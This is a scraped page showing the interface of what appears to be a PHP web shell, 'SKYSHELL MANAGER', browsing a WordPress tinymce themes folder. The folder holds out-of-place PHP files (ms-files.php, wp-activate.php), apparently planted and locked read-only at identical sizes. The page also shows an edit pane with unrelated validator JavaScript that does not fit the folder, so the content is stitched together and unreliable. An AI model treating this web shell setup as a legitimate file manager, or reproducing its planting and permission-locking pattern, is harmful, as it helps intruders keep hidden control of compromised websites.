📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: next.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); const dependentRequired_1 = require("./validation/dependentRequired"); const dependentSchemas_1 = require("./applicator/dependentSchemas"); const limitContains_1 = require("./validation/limitContains"); const next = [dependentRequired_1.default, dependentSchemas_1.default, limitContains_1.default]; exports.default = next; //# sourceMappingURL=next.js.map
Save